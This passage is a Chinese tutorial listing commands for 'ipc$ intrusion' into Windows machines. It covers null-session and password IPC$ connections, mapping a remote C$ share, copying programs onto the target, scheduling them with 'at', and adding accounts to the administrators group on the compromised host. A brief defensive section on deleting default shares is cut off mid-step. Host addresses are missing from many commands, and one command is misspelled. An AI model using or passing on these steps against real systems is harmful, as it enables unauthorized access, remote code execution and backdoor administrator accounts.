文档介绍：入侵中可能会用到的命令
为了这份教程的完整性,我列出了ipc$入侵中的一些常用命令,如果你已经掌握了这些命令,你可以跳过这一部分看下面的内容。请注意这些命令是适用于本地还是远程,如果只适用于本地,你只能在获得远程主机的shell(如cmd,等)后,才能向远程主机执行。
1 建立/删除ipc$连接的命令
1)建立空连接:
net use \\\ipc$ "" /user:""
2)建立非空连接:
net use \\\ipc$ "密码" /user:"用户名"
3)删除连接:
net use \\\ipc$ /del
2 在ipc$连接中对远程主机的操作命令
1) 查看远程主机的共享资源(看不到默认共享):
net view \\
2) 查看远程主机的当前时间:
net time \\
3) bios用户名列表:
nbtstat -A
4)映射/删除远程共享:
net use z: \\\c
此命令将共享名为c的共享资源映射为本地z盘
net use z: /del
删除映射的z盘,其他盘类推
5)向远程主机复制文件:
copy 路径\文件名\\IP\共享目录名,如:
copy c:\ \\\c$
当然,你也可以把远程主机上的文件复制到自己的机器里:
copy \\\c$\ c:\
6)远程添加计划任务:
at \\IP 时间程序名如:
at \\ 11:00
注意:时间尽量使用24小时制;如果你打算运行的程序在系统默认搜索路径(比如system32/)下则不用加路径,否则必须加全路径
3 本地命令
1)查看本地主机的共享资源(可以看到本地的默认共享)
net share
2)得到本地主机的用户列表
net user
3)显示本地某用户的帐户信息
net user 帐户名
4)显示本地主机当前启动的服务
net start
5)启动/关闭本地服务
net start 服务名
net stop 服务名
6)在本地添加帐户
net user 帐户名密码/add
7)激活禁用的用户
net uesr 帐户名/active:yes
8)加入管理员组
net localgroup administrators 帐户名/add
很显然的是,虽然这些都是本地命令,但如果你在远程主机的shell中输入,成功后输入上面这些命令,那么这些本地输入将作用在远程主机上。
如何防范ipc$入侵察看本地共享资源
运行-cmd- share
删除共享(每次输入一个)
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete(如果有e,f,……可以继续删除)
1 禁止空连接进行枚举(此操作并不能阻止空连接的建立)
运行regedit,找到如下主键